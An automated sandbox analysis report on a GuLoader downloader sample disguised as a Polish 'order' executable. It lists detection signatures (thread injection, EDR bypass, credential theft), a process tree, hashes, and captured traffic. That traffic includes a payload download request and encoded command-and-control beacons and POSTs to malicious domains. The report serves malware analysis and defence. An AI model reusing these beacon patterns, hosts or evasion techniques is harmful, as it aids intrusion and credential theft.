Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zamowienie.exe

Overview

General Information

Sample name:zamowienie.exe
Analysis ID:1539242
MD5:48f82f781035def809b0cdb2f66097a9
SHA1:4a4ddf2315449dfcad4682fe6860e617b94e60b1
SHA256:50f7a5ef12735cba58b3990988df8384294b42863033acc3d1bd939c3d00bdc5
Tags:exeuser-MarekSmar14
Infos:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • zamowienie.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\zamowienie.exe" MD5: 48F82F781035DEF809B0CDB2F66097A9)
    • zamowienie.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\zamowienie.exe" MD5: 48F82F781035DEF809B0CDB2F66097A9)
      • dmQRVBQMPL.exe (PID: 616 cmdline: "C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • verclsid.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)
          • dmQRVBQMPL.exe (PID: 764 cmdline: "C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6164 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-22T13:26:47.176136+020028032702Potentially Bad Traffic192.168.2.549876185.17.43.223443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: zamowienie.exeAvira: detected
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: zamowienie.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 185.17.43.223:443 -> 192.168.2.5:49876 version: TLS 1.2
    Source: zamowienie.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dmQRVBQMPL.exe, 00000006.00000002.3906673030.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906681333.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: wntdll.pdbUGP source: zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: zamowienie.exe, zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: verclsid.pdbGCTL source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: verclsid.pdb source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00406751 FindFirstFileA,FindClose,0_2_00406751
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405B80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EBC460 FindFirstFileW,FindNextFileW,FindClose,7_2_02EBC460
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 4x nop then xor eax, eax7_2_02EA9DF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 4x nop then mov ebx, 00000004h7_2_04DA04E8
    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
    Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49876 -> 185.17.43.223:443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uCEVRNHZgMA26.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kambud.bizCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /sa87/?vd=fhUlwfGxBn-tt&-v4puN=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8NGP70JKOBpAfy7n0mtS8Kr3O7U4faJdfEPNjknslXQEWEA== HTTP/1.1Host: www.svarus.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /y868/?-v4puN=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOp0uvryv675HptA9HxwsyIlIOO11NrggPw5LqW5SmsafU0A==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.newhopetoday.appAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /tcwz/?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg== HTTP/1.1Host: www.ladylawher.orgAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /8gyb/?-v4puN=oHLOMFnpuCQwEmmcfjaPzEs/vXwrZtaPQF7csdtv5Eh2A0RcvZoTiB5djAiNITJM5AjEN183LiB5K62qTN14+moW7AK7WqEInxUu+7Nqydpi+78xinwtbpXqTzluMhpRfQ==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /rod1/?vd=fhUlwfGxBn-tt&-v4puN=625sgw1Vn/LiYNFkuNXWgUQa6VpWz6NoZgO4nBFbZUGQF7cSiahkAd5Np5VrTvFPZWnEzDVMZ2bBqmHKU8WTD6xVXOOHKx/2RY/6WwAhCi5V31VMR0XJVnQWnK4Gp4bSPg== HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /t4fd/?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.3808.appAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /bx4s/?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.yourwebbuzz.netAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: kambud.biz
    Source: global trafficDNS traffic detected: DNS query: www.svarus.online
    Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
    Source: global trafficDNS traffic detected: DNS query: www.ladylawher.org
    Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
    Source: global trafficDNS traffic detected: DNS query: www.gold-rates.online
    Source: global trafficDNS traffic detected: DNS query: www.3808.app
    Source: global trafficDNS traffic detected: DNS query: www.yourwebbuzz.net
    Source: unknownHTTP traffic detected: POST /y868/ HTTP/1.1Host: www.newhopetoday.appAccept: */*Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brConnection: closeContent-Length: 207Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.newhopetoday.appReferer: http://www.newhopetoday.app/y868/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36Data Raw: 2d 76 34 70 75 4e 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 71 6d 61 67 4e 66 54 41 64 45 73 67 6d 4e 4d 34 4d 69 6b 6f 4a 62 6f 64 77 37 55 4f 4f 59 4a 33 69 78 33 78 41 61 7a 59 79 50 75 75 62 59 47 61 4c 73 35 61 73 33 43 2b 2b 6e 78 56 31 72 6e 65 71 4b 57 62 38 41 6e 57 67 6b 76 76 78 43 6d 5a 36 65 66 6b 68 58 52 6c 77 45 35 78 52 56 4d 47 43 58 59 41 32 55 49 39 31 39 4f 73 56 59 65 73 6c 4c 36 6b 6d 46 44 47 34 67 61 6d 63 2f 69 74 4a 57 61 66 68 32 6c 61 66 65 44 66 2b 67 2b 6c 75 65 32 2b 35 78 64 6e 32 47 47 79 36 42 54 65 70 71 76 4c 48 67 65 78 50 4d 41 57 4c 53 67 6e 6d 77 4d 76 42 30 36 53 4a 7a 45 3d Data Ascii: -v4puN=yuPu17ZIHkrUqmagNfTAdEsgmNM4MikoJbodw7UOOYJ3ix3xAazYyPuubYGaLs5as3C++nxV1rneqKWb8AnWgkvvxCmZ6efkhXRlwE5xRVMGCXYA2UI919OsVYeslL6kmFDG4gamc/itJWafh2lafeDf+g+lue2+5xdn2GGy6BTepqvLHgexPMAWLSgnmwMvB06SJzE=
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 11:27:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 4a31b0fc-240d-4165-8e51-d421e7e48755x-runtime: 0.035018content-length: 17022connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
